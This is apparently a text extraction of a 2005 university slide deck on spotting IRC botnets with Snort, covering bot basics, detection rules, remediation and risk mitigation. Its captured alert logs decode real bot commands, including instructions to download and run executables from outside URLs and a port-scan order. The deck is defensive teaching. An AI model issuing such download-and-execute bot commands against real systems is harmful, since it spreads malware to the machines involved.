Spot the Bot

8/6/2019 Spot the Bot

1/36

Spot the Bot:

IRC Bot Detection and

Remediation

Karl F. Lutzen

Systems Security AnalystUMR Information Systems Security


2/36

Agenda

Bot Basics

Detection Methods

Remediation

Risk Mitigation

Summary


3/36

Bots/Zombies/Drones

Call them anything you want but they

all describe the same thing: Trouble

Botnets Today: Fun

Malicious intent

Profitable


4/36

Dutch Botnet Bigger Than Expected

http://www.governmententerprise.com/news/172303265

October 21, 2005

Dutch prosecutors who last month arrested a trio ofyoung men for creating a large botnet allegedly used

to extort a U.S. company, steal identities, anddistribute spyware now say they bagged bigger prey:a botnet of 1.5 million machines.

The three suspects, ages 19, 22, and 27, werearrested Oct. 6 on charges of threatening a U.S. firm

with a denial-of-service (DoS) attack afterAmsterdam-based Internet service provider XS4ALLnotified authorities of unusual activity on its network.


5/36

Bots and Botnets - 1

A Bot is a remote control program loadedonto unsuspecting hosts for various

purposes, usually malicious.

TheB

ot owner has full control of whathe/she wishes to upload onto the

compromised system and what it can do.

A group ofBots under a single owner (bot

herder) is a Botnet (bot herd)


6/36

Bots and Botnets 2

Bots are spread as malicious payloads usingany number of attack vectors:

Worms

EmailViruses

Phishing

Infected files Fileshares/P2P

Direct attack of vulnerabilities

Enticement via Web/Instant Messages

(This is cool! Click Me)


7/36

Bots and Botnets - 3

Bots are usually controlled via IRC byblackhats/interested parties of all ages

The Botnet owner simply sends

commands to the IRC

C

hannel and theBots do what they are told.

Circumvent firewalls and network

address translators infected host

does the communication out to the

control


8/36

Bots and Botnets 4

Botnets can steal: Personal or businessinformation, software license keys, etc.

Botnets can launch any number of

attacks: DoS, DDoS, Send Spam,Launch Worms, Spread Pop-up Ads.

Anything the Bot owner chooses to do,

the botted systems will dutifully carry

out.


9/36

Bot Fighting on Slashdot

Microsoft's Vigilante Investigation of Zombies

Posted by Zonk on Friday October 28, @03:55PMfrom the busting-undead-skull dept.

Morgalyn writes "According to an article at InformationWeek, Microsoft has decided to fight zombie-

launched spam in their own way. In conjunction withthe FTC and consumer rights groups, Microsoft set upa clean computer and then infected it. They monitoredthe 'zombie' over the course of 20 days - 'In those 20days, this one computer received 5 million connectionrequests from spammers, and sent 18 million spammessages'. This whole operation has led to the(partial) identification of 13 different spamminggroups, some of which reside in the US and may be

prosecuted under the CAN-SPAM act."


10/36

Bot Detection Setup

Policies First! Install Network statistics monitoring

Netflow

Sflow

Firewall w/logging

Others

IDS Sensors such as Snort


11/36

Network Statistics

Determine unusual traffic patterns Find out all systems talking to a specific

host

Verify firewall rules are working or notDownside:

Hard to read

Generates a huge amount of data Only reactive


12/36

IDS with Snort

Open source software Runs on Linux, Windows and OSX

Thousands of detection rules available

Can be coupled with iptables for instantquarantine

Database alert management

Graphic consoles available

Should be located at your egress point(s)

http://www.snort.org/


13/36

Rule Sets

Select only a specific group of bot rulesAlso get the Bleeding Edge Snort rules

http://www.bleeding-snort.org/

Dont get carried away!


14/36

Rules To Choose

Get the rules that detect IRC

commandson both standard and non standard IRCports:

NICK

JOIN PRIVMSG

Use both the standard Snort and Bleeding

snort rules that cover these commands UMR does not use any custom rules to

detect bots as these basic rules really dothe job


15/36


16/36

Spot the Bot Unusual Names

NICK or USER names:USA|08039035 x445004

XP-7546411 [o]619531707

[urx]47517 wxkrihazqydm[worm3]8454428 [XkzQ]-31244

The key here is that unique names are

required in a IRC channel, thus bots

use random names


17/36

Unusual Name Sample 1

#(6 - 1326751) [2005-02-15 15:52:34] [snort/3856] BLEEDING-EDGE IRC - Nickchange on non-std port

IPv4: 131.151.xxx.yyy -> 69.31.76.179

hlen=5 TOS=32 dlen=58 ID=30 flags=0 offset=0 TTL=128 chksum=23670

TCP: port=1032 -> dport: 3994 flags=***AP*** seq=3157605320

ack=2395385288 off=5 res=0 win=8704 urp=0 chksum=11320

Payload: length = 18

000 : 4E 49 43 4B 20 5B 58 6B 7A 51 5D 2D 33 31 32 34 NICK[XkzQ]-3124

010 : 34 0A 4.


18/36

Unusual Name Sample 2

#(6 - 1885480) [2005-03-06 17:51:24] [snort/2000345] BLEEDING-EDGE IRC- Nick change on non-std port

IPv4: 131.151.xxx.yyy -> 134.36.198.28

hlen=5 TOS=32 dlen=96 ID=36715 flags=0 offset=0 TTL=128chksum=5416

TCP: port=3938 -> dport: 8080 flags=***AP*** seq=4008201724ack=92744897 off=5 res=0 win=64240 urp=0 chksum=2747


000 : 4E 49 43 4B 20 5B 77 6F 72 6D 33 5D 38 34 35 34 NICK[worm3]8454

010 : 34 32 38 0D 0A 55 53 45 52 20 75 78 71 69 6B 74 428..USERuxqikt

020 : 6D 66 20 30 20 30 20 3A 5B 77 6F 72 6D 33 5D 38 mf 0 0 :[worm3]8

030 : 34 35 34 34 32 38 0D 0A 454428..


19/36


20/36

Spot the Bot Channel names

Look for odd JOIN commands:#ev1ls x #worm3

#M0b3l1 #a,#b,#c

#port1 llck #x# lmao#.a #.dr0nz

Channel names are a little tricky asnormal names can be very similar.Recommend using IRC to get abaseline.


21/36

Channel Names

#(14 - 1584355) [2005-10-25 00:00:34] [snort/2000348] BLEEDING-EDGEATTACK RESPONSE IRC - Channel JOIN on non-std port

IPv4: 131.151.xxx.yyy -> 69.64.51.161





000 : 4A 4F 49 4E 20 23 45 76 31 6C 73 20 78 0A JOIN #Ev1ls x.


22/36

Channel Names

#(6 - 5795325) [2005-05-12 00:41:08] [snort/2000348] BLEEDING-EDGE IRC- Channel JOIN on non-std port

IPv4: 131.151.xxx.yyy -> 220.85.13.93





000 : 4A 4F 49 4E 20 23 78 23 20 6C 6D 61 6F 0D 0A JOIN #x# lmao..


23/36

Spot the Bot - PRIVMSG

Download instructions Scanning instructions

Exploited host information

Personal information (license keys)

Warning:

Private messages contain private

conversations, downloads, etc.

Use with extreme caution


24/36

Spot the Bot - PRIVMSG

#(6 - 1885569) [2005-03-06 17:52:35] [snort/2000347] BLEEDING-EDGE IRC- Private message on non-std port

IPv4: 131.151.xxx.yyy -> 193.10.218.172





000 : 50 52 49 56 4D 53 47 20 23 6C 6C 20 3A 5B 44 4F PRIVMSG #ll :[DO

010 : 57 4E 4C 4F 41 44 5D 3A 20 44 6F 77 6E 6C 6F 61 WNLOAD]: Downloa

020 : 64 69 6E 67 20 55 52 4C 3A 20 68 74 74 70 3A 2F ding URL: http:/

030 : 2F 77 77 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 /www.angelfire.c

040 : 6F 6D 2F 77 61 33 2F 6C 6F 6C 61 2F 6D 77 2E 72 om/wa3/lola/mw.r

050 : 61 72 20 74 6F 3A 20 63 3A 5C 77 69 6E 64 6F 77 ar to: c:\window

060 : 73 5C 73 79 73 74 65 6D 33 32 5C 70 6B 2E 65 78 s\system32\pk.ex

070 : 65 2E 0D 0A e...


25/36

PRIVMSG Scan Report

#(6 - 4695420) [2005-05-01 15:52:18] [snort/1] Tagged Packet

IPv4: 131.151.xxx.yyy -> 205.244.47.221





000 : 50 52 49 56 4D 53 47 20 23 6F 20 3A 5B 53 43 41 PRIVMSG #o :[SCA

010 : 4E 5D 3A 20 53 65 71 75 65 6E 74 69 61 6C 20 50 N]: Sequential P

020 : 6F 72 74 20 53 63 61 6E 20 73 74 61 72 74 65 64 ort Scan started

030 : 20 6F 6E 20 31 33 31 2E 31 35 31 2E 30 2E 30 3A on 131.151.0.0:

040 : 31 33 39 20 77 69 74 68 20 61 20 64 65 6C 61 79 139 with a delay

050 : 20 6F 66 20 34 20 73 65 63 6F 6E 64 73 20 66 6F of 4 seconds fo060 : 72 20 30 20 6D 69 6E 75 74 65 73 20 75 73 69 6E r 0 minutes usin

070 : 67 20 32 30 30 20 74 68 72 65 61 64 73 2E 0D 0A g 200 threads...


26/36

Tagged Packets

Part of the instructions within a Snortrule will generate what are called

Tagged Packets. They do not match

the full inspection for the purpose of the

rule, but they contain significant

information. Turning them off is

possible, but are very useful.


27/36

User MODE: Invisible


IPv4: 131.151.xxx.yyy -> 69.64.51.161



ack=2490835835 off=5 res=0 win=17153 urp=0 chksum=39888Payload: length = 43

000 : 4D 4F 44 45 20 5B 58 50 2D 37 35 34 36 34 31 31 MODE [XP-7546411

010 : 5D 20 2B 69 78 0A 4D 4F 44 45 20 5B 58 50 2D 37 ] +ix.MODE [XP-7

020 : 35 34 36 34 31 31 5D 20 2B 69 0A 546411] +i.


28/36

Tagged Packet Other Data


IPv4: 69.50.230.207 -> 131.151.xxx.yyy





000 : 3A 71 21 66 64 67 64 66 67 40 68 65 6C 6C 6F 2E :q!fdgdfg@hello.

010 : 6E 65 74 20 54 4F 50 49 43 20 23 77 6F 6F 74 20 net TOPIC #woot

020 : 3A 2E 64 6C 20 68 74 74 70 3A 2F 2F 68 6F 6D 65 :.dl http://home

030 : 70 61 67 65 2E 6E 74 6C 77 6F 72 6C 64 2E 63 6F page.ntlworld.co

040 : 6D 2F 74 72 61 63 65 79 33 32 2F 61 2E 65 78 65 m/tracey32/a.exe

050 : 20 61 2E 65 78 65 20 31 20 2D 73 0D 0A a.exe 1 -s..


29/36

Tagged Packet Other Data

#(6 - 5795327) [2005-05-12 00:41:08] [snort/1] Tagged PacketIPv4: 220.85.13.93 -> 131.151.xxx.yyy





000 : 3A 73 64 79 79 78 63 6B 67 64 66 6D 21 7E 73 64 :sdyyxckgdfm!~sd

010 : 79 79 78 63 6B 67 64 40 31 33 31 2E 31 35 31 2E [email protected].

020 : xx xx xx 2E xx xx xx 20 4A 4F 49 4E 20 3A 23 78 xxx.yyy JOIN :#x

030 : 23 0D 0A 3A 53 53 48 20 33 33 32 20 73 64 79 79 #..:SSH 332 sdyy

040 : 78 63 6B 67 64 66 6D 20 23 78 23 20 3A 2E 61 69 xckgdfm #x# :.ai

050 : 6D 73 70 72 65 61 64 20 68 74 74 70 3A 2F 2F 76 mspreadhttp://v

060 : 6F 69 70 73 74 6F 72 65 2E 6E 65 74 2F 6D 79 70 oipstore.net/myp070 : 69 63 2E 63 6F 6D 0D 0A 3A 53 53 48 20 33 33 33 ic.com..:SSH 333

080 : 20 73 64 79 79 78 63 6B 67 64 66 6D 20 23 78 23 sdyyxckgdfm #x#

090 : 20 31 30 3A 33 30 20 50 4D 20 31 31 31 35 38 37 10:30 PM 111587

0a0 : 39 36 38 35 0D 0A 3A 53 53 48 20 33 36 36 20 73 9685..:SSH 366 s

0b0 : 64 79 79 78 63 6B 67 64 66 6D 20 23 78 23 20 3A dyyxckgdfm #x# :

0c0 : 45 6E 64 20 6F 66 20 2F 4E 41 4D 45 53 20 6C 69 End of /NAMES li

0d0 : 73 74 2E 0D 0A st...


30/36

Thats All There Is To It!

You now have the basics to detect all bots

If you discover a group of infected hosts

talking to a single server, be sure to reportit to:

[email protected]

Sharing information is the best way to

combat bots.


31/36

Feds Bust Suspected Bot Master

Federal authorities arrested a 20-year-old California

man on Thursday, accusing him of creating botsoftware to compromise nearly 400,000 Windowscomputers and using his control of the systems togarner more than $60,000 in profits.

Over nearly a year, Ancheta allegedly usedautomated software to infect Windows systems,advertised and sold access to the compromised PCs,and used the software to perpetrate click fraud,garnering tens of thousands of dollars in affiliate fees,according to a 58-page indictment released on

Thursday.

Security Focus, Nov 4, 2005

http://enterprisesecurity.symantec.com/content.cfm?articleid=6156


32/36

Remediation

Generally will end up with someAdministrator/SYSTEM level compromise

Can be cleaned, but no guarantees

rare to return to trusted state.

Possible rootkits

www.sysinternals.com tools great tools

Hidden files Entire Internet is domain for other installs

Best Practice: Flatten/Rebuild


33/36

Risk Mitigation

Educate your users. Repeatedly Web browser security settings

Do not run as Admin

Install Anti-virus software with auto Updates

Keep systems patched DONT CLICK THAT LINK!

Block ports not needed for business

Proxy servers

Install network statistics monitoring like netflow

Install IDS sensors like Snort


34/36

Other Issues with Bots

Encryption Modified IRC servers

Morphing tendencies

Commands change Exploits change adapt to new

vulnerabilities

Moving targets

IRC servers change

Ports change


35/36

Summary

Bots will be with us for a very long time Best practices:

Educate Users: Patches/Security

Settings/What not to do!

Install IDS and network statistics monitoring

Keep yourself up to date on the bots and

tactics

Share your findings. Inform MOREnet:[email protected]

Further questions: [email protected]


36/36

Spot the Bot

Documents